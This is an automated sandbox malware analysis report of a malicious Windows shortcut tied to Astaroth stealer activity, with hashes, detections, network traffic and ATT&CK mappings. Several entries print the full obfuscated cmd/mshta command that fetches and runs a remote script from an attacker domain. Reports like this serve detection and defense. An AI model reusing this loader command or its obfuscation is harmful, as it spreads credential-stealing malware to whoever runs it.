Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Intimacao758073849.lNK.lnk

Overview

General Information

Sample name:Intimacao758073849.lNK.lnk
Analysis ID:1615368
MD5:bbf3972f4aaedf65174fd0cd7cf6d757
SHA1:be4570f581198b959cc3c882c2490189f435c12d
SHA256:031f5daf0774b13b3a63aa8640620c391f986ddfd29dede692480e6335383666
Tags:lnkuser-abuse_ch
Infos:

Detection

Score:68
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Joe Sandbox ML detected suspicious sample
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 1172 cmdline: "C:\Windows\System32\cmd.exe" /v:on /v:off /D/c MShTa "javAscRipT:try{try{try{var _33lI1XURA=["\x57\x44\x55\102\x57\x43\x51","\163\143\x72\x69\160\164\x3a\x48\164\x74\x50\x73\x3a\57\x2f\x74\x72\x69\x74\x75\x6d\56\x76\x69\x7a\160\x61\x7a\56\x65\170\x70\x72\145\x73\163\x2f\x3f\x31\x2f"];GetObject(_33lI1XURA[1])[_33lI1XURA[0]]();}catch(e){}}catch(e){}}catch(e){}close()" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mshta.exe (PID: 4852 cmdline: MShTa "javAscRipT:try{try{try{var _33lI1XURA=["\x57\x44\x55\102\x57\x43\x51","\163\143\x72\x69\160\164\x3a\x48\164\x74\x50\x73\x3a\57\x2f\x74\x72\x69\x74\x75\x6d\56\x76\x69\x7a\160\x61\x7a\56\x65\170\x70\x72\145\x73\163\x2f\x3f\x31\x2f"];GetObject(_33lI1XURA[1])[_33lI1XURA[0]]();}catch(e){}}catch(e){}}catch(e){}close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-14T20:11:02.680532+010028512881A Network Trojan was detected192.168.2.649709188.114.96.3443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: Intimacao758073849.lNK.lnkVirustotal: Detection: 29%Perma Link
Source: Intimacao758073849.lNK.lnkReversingLabs: Detection: 27%
Joe Sandbox ML detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.4% probability
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.15.59.224:443 -> 192.168.2.6:49710 version: TLS 1.2

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2851288 - Severity 1 - ETPRO MALWARE Astaroth Stealer Activity (GET) : 192.168.2.6:49709 -> 188.114.96.3:443
Source: global trafficTCP traffic: 192.168.2.6:55165 -> 1.1.1.1:53
Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox ViewIP Address: 185.15.59.224 185.15.59.224
Source: Joe Sandbox ViewIP Address: 185.15.59.224 185.15.59.224
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /?1/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: tritum.vizpaz.expressConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.wikipedia.org
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /?1/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: tritum.vizpaz.expressConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.wikipedia.org
Source: global trafficDNS traffic detected: DNS query: tritum.vizpaz.express
Source: global trafficDNS traffic detected: DNS query: www.wikipedia.org
Source: mshta.exe, 00000002.00000003.2161051958.000002AA1356D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2164126544.000002A210B75000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153676662.000002A210B75000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2164908121.000002A210B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: HttPs://tritum.vizpaz.express/?1/
Source: mshta.exe, 00000002.00000003.2150557370.000002AA13425000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2165544408.000002AA136C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153327660.000002AA13663000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153464520.000002A210BA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153759719.000002AA136C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2157208483.000002AA1343A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153327660.000002AA136A2000.00000004.00000020.00020000.00000000.sdmp, 4NWM0C2K.htm.2.drString found in binary or memory: https://creativecommons.org/licenses/by-sa/4.0/
Source: mshta.exe, 00000002.00000003.2150557370.000002AA13425000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2157208483.000002AA1343A000.00000004.00000020.00020000.00000000.sdmp, 4NWM0C2K.htm.2.drString found in binary or memory: https://donate.wikimedia.org/?wmf_medium=portal&wmf_campaign=portalFooter&wmf_source=portalFooter
Source: mshta.exe, 00000002.00000003.2150557370.000002AA13425000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2165544408.000002AA136C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153327660.000002AA13663000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153464520.000002A210BA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153759719.000002AA136C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2157208483.000002AA1343A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153327660.000002AA136A2000.00000004.00000020.00020000.00000000.sdmp, 4NWM0C2K.htm.2.drString found in binary or memory: https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Privacy_policy
Source: mshta.exe, 00000002.00000003.2150557370.000002AA13425000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2165544408.000002AA136C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153327660.000002AA13663000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153464520.000002A210BA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153759719.000002AA136C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2157208483.000002AA1343A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153327660.000002AA136A2000.00000004.00000020.00020000.00000000.sdmp, 4NWM0C2K.htm.2.drString found in binary or memory: https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Terms_of_Use
Source: mshta.exe, 00000002.00000003.2164201881.000002A210B49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2164815019.000002A210B25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153464520.000002A210BD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2164299160.000002A210B25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153593726.000002A210BD6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2164846336.000002A210B4C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153795741.000002A210B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c
Source: mshta.exe, 00000002.00000003.2150557370.000002AA13425000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2157208483.000002AA1343A000.00000004.00000020.00020000.00000000.sdmp, 4NWM0C2K.htm.2.drString found in binary or memory: https://itunes.apple.com/app/apple-store/id324715238?pt=208305&ct=portal&mt=8
Source: mshta.exe, 00000002.00000003.2150557370.000002AA13425000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2157208483.000002AA1343A000.00000004.00000020.00020000.00000000.sdmp, 4NWM0C2K.htm.2.drString found in binary or memory: https://meta.wikimedia.org/wiki/Special:MyLanguage/List_of_Wikipedias
Source: mshta.exe, 00000002.00000003.2150557370.000002AA13425000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2157208483.000002AA1343A000.00000004.00000020.00020000.00000000.sdmp, 4NWM0C2K.htm.2.drString found in binary or memory: https://play.google.com/store/apps/details?id=org.wikipedia&referrer=utm_source%3Dportal%26utm_mediu
Source: mshta.exe, 00000002.00000003.2139843570.000002AA1366A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2164126544.000002A210B75000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153676662.000002A210B75000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2164908121.000002A210B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tritum.vizpaz.express/?1/
Source: mshta.exe, 00000002.00000003.2164280112.000002AA136BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153779908.000002AA136BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153327660.000002AA136A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tritum.vizpaz.express/?1/(
Source: mshta.exe, 00000002.00000002.2164961990.000002A210BA3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153464520.000002A210BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tritum.vizpaz.express/?1/C
Source: mshta.exe, 00000002.00000002.2164961990.000002A210BA3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153464520.000002A210BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tritum.vizpaz.express/?1/F
Source: mshta.exe, 00000002.00000003.2164280112.000002AA136BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2165519421.000002AA136BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153779908.000002AA136BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153327660.000002AA136A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tritum.vizpaz.express/?1/I
Source: mshta.exe, 00000002.00000002.2164961990.000002A210BA3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153464520.000002A210BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tritum.vizpaz.express/?1/k
Source: mshta.exe, 00000002.00000002.2164961990.000002A210BA3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153464520.000002A210BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tritum.vizpaz.express/W
Source: mshta.exe, 00000002.00000002.2164961990.000002A210BA3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153464520.000002A210BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tritum.vizpaz.express/Y
Source: mshta.exe, 00000002.00000003.2150557370.000002AA13425000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2157208483.000002AA1343A000.00000004.00000020.00020000.00000000.sdmp, 4NWM0C2K.htm.2.drString found in binary or memory: https://upload.wikimedia.org/wikipedia/en/thumb/8/80/Wikipedia-logo-v2.svg/2244px-Wikipedia-logo-v2.
Source: mshta.exe, 00000002.00000003.2150557370.000002AA13425000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2157208483.000002AA1343A000.00000004.00000020.00020000.00000000.sdmp, 4NWM0C2K.htm.2.drString found in binary or memory: https://wikis.world/
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.15.59.224:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal68.winLNK@4/1@2/2
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\4NWM0C2K.htmJump to behavior
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Intimacao758073849.lNK.lnkVirustotal: Detection: 29%
Source: Intimacao758073849.lNK.lnkReversingLabs: Detection: 27%
Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /v:on /v:off /D/c MShTa "javAscRipT:try{try{try{var _33lI1XURA=["\x57\x44\x55\102\x57\x43\x51","\163\143\x72\x69\160\164\x3a\x48\164\x74\x50\x73\x3a\57\x2f\x74\x72\x69\x74\x75\x6d\56\x76\x69\x7a\160\x61\x7a\56\x65\170\x70\x72\145\x73\163\x2f\x3f\x31\x2f"];GetObject(_33lI1XURA[1])[_33lI1XURA[0]]();}catch(e){}}catch(e){}}catch(e){}close()"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe MShTa "javAscRipT:try{try{try{var _33lI1XURA=["\x57\x44\x55\102\x57\x43\x51","\163\143\x72\x69\160\164\x3a\x48\164\x74\x50\x73\x3a\57\x2f\x74\x72\x69\x74\x75\x6d\56\x76\x69\x7a\160\x61\x7a\56\x65\170\x70\x72\145\x73\163\x2f\x3f\x31\x2f"];GetObject(_33lI1XURA[1])[_33lI1XURA[0]]();}catch(e){}}catch(e){}}catch(e){}close()"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe MShTa "javAscRipT:try{try{try{var _33lI1XURA=["\x57\x44\x55\102\x57\x43\x51","\163\143\x72\x69\160\164\x3a\x48\164\x74\x50\x73\x3a\57\x2f\x74\x72\x69\x74\x75\x6d\56\x76\x69\x7a\160\x61\x7a\56\x65\170\x70\x72\145\x73\163\x2f\x3f\x31\x2f"];GetObject(_33lI1XURA[1])[_33lI1XURA[0]]();}catch(e){}}catch(e){}}catch(e){}close()" Jump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
Source: mshta.exe, 00000002.00000002.2164961990.000002A210BA3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2165374329.000002AA13654000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153464520.000002A210BA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: mshta.exe, 00000002.00000002.2164961990.000002A210BA3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153464520.000002A210BA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe MShTa "javAscRipT:try{try{try{var _33lI1XURA=["\x57\x44\x55\102\x57\x43\x51","\163\143\x72\x69\160\164\x3a\x48\164\x74\x50\x73\x3a\57\x2f\x74\x72\x69\x74\x75\x6d\56\x76\x69\x7a\160\x61\x7a\56\x65\170\x70\x72\145\x73\163\x2f\x3f\x31\x2f"];GetObject(_33lI1XURA[1])[_33lI1XURA[0]]();}catch(e){}}catch(e){}}catch(e){}close()" Jump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /v:on /v:off /d/c mshta "javascript:try{try{try{var _33li1xura=["\x57\x44\x55\102\x57\x43\x51","\163\143\x72\x69\160\164\x3a\x48\164\x74\x50\x73\x3a\57\x2f\x74\x72\x69\x74\x75\x6d\56\x76\x69\x7a\160\x61\x7a\56\x65\170\x70\x72\145\x73\163\x2f\x3f\x31\x2f"];getobject(_33li1xura[1])[_33li1xura[0]]();}catch(e){}}catch(e){}}catch(e){}close()"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:try{try{try{var _33li1xura=["\x57\x44\x55\102\x57\x43\x51","\163\143\x72\x69\160\164\x3a\x48\164\x74\x50\x73\x3a\57\x2f\x74\x72\x69\x74\x75\x6d\56\x76\x69\x7a\160\x61\x7a\56\x65\170\x70\x72\145\x73\163\x2f\x3f\x31\x2f"];getobject(_33li1xura[1])[_33li1xura[0]]();}catch(e){}}catch(e){}}catch(e){}close()"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:try{try{try{var _33li1xura=["\x57\x44\x55\102\x57\x43\x51","\163\143\x72\x69\160\164\x3a\x48\164\x74\x50\x73\x3a\57\x2f\x74\x72\x69\x74\x75\x6d\56\x76\x69\x7a\160\x61\x7a\56\x65\170\x70\x72\145\x73\163\x2f\x3f\x31\x2f"];getobject(_33li1xura[1])[_33li1xura[0]]();}catch(e){}}catch(e){}}catch(e){}close()" Jump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Command and Scripting Interpreter		1
DLL Side-Loading		11
Process Injection		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote Services1
Email Collection		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		11
Process Injection		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading		Security Account Manager1
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared Drive13
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS2
System Information Discovery		Distributed Component Object ModelInput Capture1
Ingress Tool Transfer		Traffic DuplicationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.